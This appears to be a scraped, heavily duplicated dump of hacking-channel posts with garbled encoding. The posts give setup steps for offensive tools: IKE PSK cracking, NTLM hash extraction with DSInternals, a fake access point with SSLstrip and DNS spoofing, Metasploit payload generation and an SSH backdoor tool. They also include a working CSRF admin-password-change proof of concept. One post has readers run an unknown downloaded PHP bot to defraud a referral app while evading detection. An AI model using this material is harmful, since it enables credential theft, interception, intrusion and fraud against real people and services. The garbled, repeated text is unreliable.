โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat is PostgreSQL ? (@ wikipedia)
t.me/UnderCodeTestingOfficial
> PostgreSQL is a general purpose and object-relational database management system, the most advanced open source database system. PostgreSQL was developed based on POSTGRES 4.2 at Berkeley Computer Science Department, University of California.
>PostgreSQL was designed to run on UNIX-like platforms. However, PostgreSQL was then also designed to be portable so that it could run on various platforms such as Mac OS X, Solaris, and Windows.
>PostgreSQL is free and open source software. Its source code is available under PostgreSQL license, a liberal open source license. You are free to use, modify and distribute PostgreSQL in any form.
>PostgreSQL requires very minimum maintained efforts because of its stability. Therefore, if you develop applications based on PostgreSQL, the total cost of ownership is low in comparison with other database management systems.
๐ฆFeatures:
> User-defined types
> Table inheritance
> Sophisticated locking mechanism
> Foreign key referential integrity
> Views, rules, subquery
๐ฆOfficial Download Link:
>https://www.postgresql.org/
> Nested transactions (savepoints)
> Multi-version concurrency control (MVCC)
> Asynchronous replication
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat is PostgreSQL ? (@ wikipedia)
t.me/UnderCodeTestingOfficial
> PostgreSQL is a general purpose and object-relational database management system, the most advanced open source database system. PostgreSQL was developed based on POSTGRES 4.2 at Berkeley Computer Science Department, University of California.
>PostgreSQL was designed to run on UNIX-like platforms. However, PostgreSQL was then also designed to be portable so that it could run on various platforms such as Mac OS X, Solaris, and Windows.
>PostgreSQL is free and open source software. Its source code is available under PostgreSQL license, a liberal open source license. You are free to use, modify and distribute PostgreSQL in any form.
>PostgreSQL requires very minimum maintained efforts because of its stability. Therefore, if you develop applications based on PostgreSQL, the total cost of ownership is low in comparison with other database management systems.
๐ฆFeatures:
> User-defined types
> Table inheritance
> Sophisticated locking mechanism
> Foreign key referential integrity
> Views, rules, subquery
๐ฆOfficial Download Link:
>https://www.postgresql.org/
> Nested transactions (savepoints)
> Multi-version concurrency control (MVCC)
> Asynchronous replication
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest IKE Scanner Original Tool
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Termux-root/Kali/Debian/Parrot
1) git clone https://github.com/royhills/ike-scan
2) cd ike-scan
3) autoreconf --install to generate a viable ./configure file
4) Run ./configure or ./configure --with-openssl to use the OpenSSL libraries
5) Run make to build the project
6) Run make check to verify that everything works as expected
7) Run make install
8) ike-scan -h
๐ฆFeatures:
1) Discovery Determine which hosts in a given IP range are running IKE. This is done by displaying those hosts which respond to the IKE requests sent by ike-scan.
2) Fingerprinting Determine which IKE implementation the hosts are using, and in some cases determine the version of software that they are running. This is done in two ways: firstly by UDP backoff fingerprinting which involves recording the times of the IKE response packets from the target hosts and comparing the observed retransmission backoff pattern against known patterns; and secondly by Vendor ID fingerprinting which compares Vendor ID payloads from the VPN servers against known vendor id patterns.
3) Transform Enumeration Find which transform attributes are supported by the VPN server for IKE Phase-1 (e.g. encryption algorithm, hash algorithm etc.).
4) User Enumeration For some VPN systems, discover valid VPN usernames.
5) Pre-Shared Key Cracking Perform offline dictionary or brute-force password cracking for IKE Aggressive Mode with Pre-Shared Key authentication. This uses ike-scan to obtain the hash and other parameters, and psk-crack (which is part of the ike-scan package) to perform the cracking
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest IKE Scanner Original Tool
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Termux-root/Kali/Debian/Parrot
1) git clone https://github.com/royhills/ike-scan
2) cd ike-scan
3) autoreconf --install to generate a viable ./configure file
4) Run ./configure or ./configure --with-openssl to use the OpenSSL libraries
5) Run make to build the project
6) Run make check to verify that everything works as expected
7) Run make install
8) ike-scan -h
๐ฆFeatures:
1) Discovery Determine which hosts in a given IP range are running IKE. This is done by displaying those hosts which respond to the IKE requests sent by ike-scan.
2) Fingerprinting Determine which IKE implementation the hosts are using, and in some cases determine the version of software that they are running. This is done in two ways: firstly by UDP backoff fingerprinting which involves recording the times of the IKE response packets from the target hosts and comparing the observed retransmission backoff pattern against known patterns; and secondly by Vendor ID fingerprinting which compares Vendor ID payloads from the VPN servers against known vendor id patterns.
3) Transform Enumeration Find which transform attributes are supported by the VPN server for IKE Phase-1 (e.g. encryption algorithm, hash algorithm etc.).
4) User Enumeration For some VPN systems, discover valid VPN usernames.
5) Pre-Shared Key Cracking Perform offline dictionary or brute-force password cracking for IKE Aggressive Mode with Pre-Shared Key authentication. This uses ike-scan to obtain the hash and other parameters, and psk-crack (which is part of the ike-scan package) to perform the cracking
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Facebook Vulnerability Simple bug fond On Facebook since-2018
Facebook And Google Reviews System For Businesses
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> Cross-Site Request Forgery
> Version: v1 (REQUIRED)
๐ฆ Tested on: Linux
# 1 Poof Of Concept (Change password):
<html>
<body>
<form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
<input class="form-control" name="name" value="Admin" type="text">
<input class="form-control" name="email" value="admin@ranksol.com" type="text">
<input class="form-control" name="password" value="password" type="text">
<input class="form-control" name="phone" value="+18323041166" type="text">
<input type="hidden" name="id" value="1">
<button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span> Save</button>
</form>
</body>
</html>
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Facebook Vulnerability Simple bug fond On Facebook since-2018
Facebook And Google Reviews System For Businesses
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> Cross-Site Request Forgery
> Version: v1 (REQUIRED)
๐ฆ Tested on: Linux
# 1 Poof Of Concept (Change password):
<html>
<body>
<form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
<input class="form-control" name="name" value="Admin" type="text">
<input class="form-control" name="email" value="admin@ranksol.com" type="text">
<input class="form-control" name="password" value="password" type="text">
<input class="form-control" name="phone" value="+18323041166" type="text">
<input type="hidden" name="id" value="1">
<button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span> Save</button>
</form>
</body>
</html>
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Extract Password from Hash
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
A) DSInternals PowerShell
> The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of its Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/MichaelGrafnetter/DSInternals
2) cd DSInternals
3) Now Extract the DSInternals directory to your PowerShell modules directory, e.g. C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals or C:\Users\John\Documents\WindowsPowerShell\Modules\DSInternals.
(Optional) If you copied the module to a different directory than advised in the previous step, you have to manually import it using the Import-Module cmdlet.
๐ฆHow It Works ?
This method is only applicable to Windows users. To extract NTLM hashes you can take the help of the following commands Example:
1) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals
1...
2...
3...
2) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals)
๐ฆTested On:
>Win 10
e n j o y
Written ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Extract Password from Hash
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
A) DSInternals PowerShell
> The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of its Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/MichaelGrafnetter/DSInternals
2) cd DSInternals
3) Now Extract the DSInternals directory to your PowerShell modules directory, e.g. C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals or C:\Users\John\Documents\WindowsPowerShell\Modules\DSInternals.
(Optional) If you copied the module to a different directory than advised in the previous step, you have to manually import it using the Import-Module cmdlet.
๐ฆHow It Works ?
This method is only applicable to Windows users. To extract NTLM hashes you can take the help of the following commands Example:
1) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals
1...
2...
3...
2) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals)
๐ฆTested On:
>Win 10
e n j o y
Written ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Method Earn money in paypal
๐ฆUse For learn Not For Stealing
T.me/UnderCodeTestinGOfficial
1.Download the text plus application create a virtual number
2. Download bigtoken from play store
3. Download termux
4. Register in bigtoken with your virtual number and with this referral code so they don't give you ban: PUMECMF00 (Important)
5. Download this:
https://www.mediafire.com/file/iem8zh356sfb2hs/bigtoken.zip/file
and extract it in downloads
6. Go to termux and enter the following commands
$ pkg update && pkg upgrade
$ pkg install php
$ pkg install nano
$ pkg install git
$ termux-setup-storage
$ cd storage
$ cd downloads
$ ls
$ cd bigtoken
$ php bot.php
7. Enter your email and password with which you created the bigtoken account
8. Press the letter: "Y" and enter
9. Press the number: "2" and enter
Do not take more than 25 dollars in a week since they could give you ban
Do the method every 24 hours to avoid suspicion
๐ฆTESTED
@ KADRINO
-------UNDER๐ฎ๐D๐-----
๐ฆUse For learn Not For Stealing
T.me/UnderCodeTestinGOfficial
1.Download the text plus application create a virtual number
2. Download bigtoken from play store
3. Download termux
4. Register in bigtoken with your virtual number and with this referral code so they don't give you ban: PUMECMF00 (Important)
5. Download this:
https://www.mediafire.com/file/iem8zh356sfb2hs/bigtoken.zip/file
and extract it in downloads
6. Go to termux and enter the following commands
$ pkg update && pkg upgrade
$ pkg install php
$ pkg install nano
$ pkg install git
$ termux-setup-storage
$ cd storage
$ cd downloads
$ ls
$ cd bigtoken
$ php bot.php
7. Enter your email and password with which you created the bigtoken account
8. Press the letter: "Y" and enter
9. Press the number: "2" and enter
Do not take more than 25 dollars in a week since they could give you ban
Do the method every 24 hours to avoid suspicion
๐ฆTESTED
@ KADRINO
-------UNDER๐ฎ๐D๐-----
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Extract Password from Hash
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
A) DSInternals PowerShell
> The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of its Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/MichaelGrafnetter/DSInternals
2) cd DSInternals
3) Now Extract the DSInternals directory to your PowerShell modules directory, e.g. C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals or C:\Users\John\Documents\WindowsPowerShell\Modules\DSInternals.
(Optional) If you copied the module to a different directory than advised in the previous step, you have to manually import it using the Import-Module cmdlet.
๐ฆHow It Works ?
This method is only applicable to Windows users. To extract NTLM hashes you can take the help of the following commands Example:
1) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals
1...
2...
3...
2) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals)
๐ฆTested On:
>Win 10
e n j o y
Written ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Extract Password from Hash
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
A) DSInternals PowerShell
> The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of its Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/MichaelGrafnetter/DSInternals
2) cd DSInternals
3) Now Extract the DSInternals directory to your PowerShell modules directory, e.g. C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals or C:\Users\John\Documents\WindowsPowerShell\Modules\DSInternals.
(Optional) If you copied the module to a different directory than advised in the previous step, you have to manually import it using the Import-Module cmdlet.
๐ฆHow It Works ?
This method is only applicable to Windows users. To extract NTLM hashes you can take the help of the following commands Example:
1) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals
1...
2...
3...
2) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals)
๐ฆTested On:
>Win 10
e n j o y
Written ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆAll in one 2019 recon, scanning,
parsing, and creating malicious payloads and listeners with Metasploit. For use with Kali Linux
and the Penetration Testers Framework (PTF).
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/leebaird/discover /opt/discover/
> All scripts must be ran from this location.
2) cd /opt/discover/
3) chmod 777 update.sh
4) ./update.sh
๐ฆRECON
1. Domain
2. Person
3. Parse salesforce
๐ฆSCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux
๐ฆWEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL
๐ฆMISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
@ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAll in one 2019 recon, scanning,
parsing, and creating malicious payloads and listeners with Metasploit. For use with Kali Linux
and the Penetration Testers Framework (PTF).
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/leebaird/discover /opt/discover/
> All scripts must be ran from this location.
2) cd /opt/discover/
3) chmod 777 update.sh
4) ./update.sh
๐ฆRECON
1. Domain
2. Person
3. Parse salesforce
๐ฆSCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux
๐ฆWEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL
๐ฆMISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
@ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to create a fake AP and sniff data.
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/xdavidhu/mitmAP
2) cd mitmAP
3) python mitmAP.py
๐ฆHow it Works:
1) SSLstrip2 for HSTS bypass
2) Image capture with Driftnet
3) TShark for command line .pcap capture
๐ฆFeatures:
> SSLstrip2
> Driftnet
> Tshark
> Full featured access point, with configurable speed limit
> mitmproxy
> Wireshark
> DNS Spoofing
> Saving results to file
@ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to create a fake AP and sniff data.
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/xdavidhu/mitmAP
2) cd mitmAP
3) python mitmAP.py
๐ฆHow it Works:
1) SSLstrip2 for HSTS bypass
2) Image capture with Driftnet
3) TShark for command line .pcap capture
๐ฆFeatures:
> SSLstrip2
> Driftnet
> Tshark
> Full featured access point, with configurable speed limit
> mitmproxy
> Wireshark
> DNS Spoofing
> Saving results to file
@ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/codingo/Reconnoitre.git
> After you have done this run setup.py with the following:
2) python3 setup.py install
3) After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using:
reconnoitre <args>
๐ฆCommands:
Argument Description
-h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Supress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.
@ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/codingo/Reconnoitre.git
> After you have done this run setup.py with the following:
2) python3 setup.py install
3) After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using:
reconnoitre <args>
๐ฆCommands:
Argument Description
-h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Supress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.
@ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019 tool that discovers valid subdomains for websites.
> Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/projectdiscovery/subfinder/releases/
2) Download .tar
3) tar -xzvf subfinder-linux-amd64.tar
4) mv subfinder-linux-amd64 /usr/bin/subfinder
5)subfinder
๐ฆIf you want to build it yourself, you can go get the repo
> go get -v github.com/projectdiscovery/subfinder/cmd/subfinder
> If you wish to upgrade the package you can use:
> go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder
๐ฆRunning:
1) If you are using docker, you need to first create your directory structure holding subfinder configuration file. After modifying the default config.yaml file, you can run:
2) mkdir $HOME/.config/subfinder
3) cp config.yaml $HOME/.config/subfinder/config.yaml
4) nano $HOME/.config/subfinder/config.yaml
5) docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d freelancer.com
๐ฆHow To Use:
1) Running Subfinder
To run the tool on a target, just use the following command.
2) subfinder -d freelancer.com
This will run the tool against freelancer.com. There are a number of configuration options that you can pass along with this command. The verbose switch (-v) can be used to display verbose information.
[CERTSPOTTER] www.fi.freelancer.com
[DNSDUMPSTER] hosting.freelancer.com
[DNSDUMPSTER] support.freelancer.com
[DNSDUMPSTER] accounts.freelancer.com
[DNSDUMPSTER] phabricator.freelancer.com
[DNSDUMPSTER] cdn1.freelancer.com
[DNSDUMPSTER] t1.freelancer.com
[DNSDUMPSTER] wdc.t1.freelancer.com
[DNSDUMPSTER] dal.t1.freelancer.com
The -o command can be used to specify an output file.
> subfinder -d freelancer.com -o output.txt
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019 tool that discovers valid subdomains for websites.
> Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/projectdiscovery/subfinder/releases/
2) Download .tar
3) tar -xzvf subfinder-linux-amd64.tar
4) mv subfinder-linux-amd64 /usr/bin/subfinder
5)subfinder
๐ฆIf you want to build it yourself, you can go get the repo
> go get -v github.com/projectdiscovery/subfinder/cmd/subfinder
> If you wish to upgrade the package you can use:
> go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder
๐ฆRunning:
1) If you are using docker, you need to first create your directory structure holding subfinder configuration file. After modifying the default config.yaml file, you can run:
2) mkdir $HOME/.config/subfinder
3) cp config.yaml $HOME/.config/subfinder/config.yaml
4) nano $HOME/.config/subfinder/config.yaml
5) docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d freelancer.com
๐ฆHow To Use:
1) Running Subfinder
To run the tool on a target, just use the following command.
2) subfinder -d freelancer.com
This will run the tool against freelancer.com. There are a number of configuration options that you can pass along with this command. The verbose switch (-v) can be used to display verbose information.
[CERTSPOTTER] www.fi.freelancer.com
[DNSDUMPSTER] hosting.freelancer.com
[DNSDUMPSTER] support.freelancer.com
[DNSDUMPSTER] accounts.freelancer.com
[DNSDUMPSTER] phabricator.freelancer.com
[DNSDUMPSTER] cdn1.freelancer.com
[DNSDUMPSTER] t1.freelancer.com
[DNSDUMPSTER] wdc.t1.freelancer.com
[DNSDUMPSTER] dal.t1.freelancer.com
The -o command can be used to specify an output file.
> subfinder -d freelancer.com -o output.txt
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTermux exploite databse /see bugs in server + auto nmap and much more via simple automate script
twitter.com/UnderCodeTC
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/kuburan/txtool
2) cd txtool
3) apt install python2
4) ./install.py
5) txtool
6) for ssh backdoor access, txtool used paramiko python library that required PyNacl if you have an error installing PyNacl, follow my steps:
> apt-get install --assume-yes libsodium libsodium-dev
> SODIUM_INSTALL=system pip2 install pynacl
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTermux exploite databse /see bugs in server + auto nmap and much more via simple automate script
twitter.com/UnderCodeTC
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/kuburan/txtool
2) cd txtool
3) apt install python2
4) ./install.py
5) txtool
6) for ssh backdoor access, txtool used paramiko python library that required PyNacl if you have an error installing PyNacl, follow my steps:
> apt-get install --assume-yes libsodium libsodium-dev
> SODIUM_INSTALL=system pip2 install pynacl
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆGenerate combos based on Keywords with Termux
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update&&apt upgrade -y
2) termux-setup-storage
3) pkg install php git -y
4) git clone https://github.com/Juni0r007/PasTerm.git
5) cd PasTerm
6) Ejecutamos el archivo *.php
7) chmod +x pasterm.php;
chmod +x pasterm.class.php
8) php pasterm.php
๐ฆVid Tutorial:
> https://www.youtube.com/watch?v=0k9D20r2Q3U
Thats All
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆGenerate combos based on Keywords with Termux
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update&&apt upgrade -y
2) termux-setup-storage
3) pkg install php git -y
4) git clone https://github.com/Juni0r007/PasTerm.git
5) cd PasTerm
6) Ejecutamos el archivo *.php
7) chmod +x pasterm.php;
chmod +x pasterm.class.php
8) php pasterm.php
๐ฆVid Tutorial:
> https://www.youtube.com/watch?v=0k9D20r2Q3U
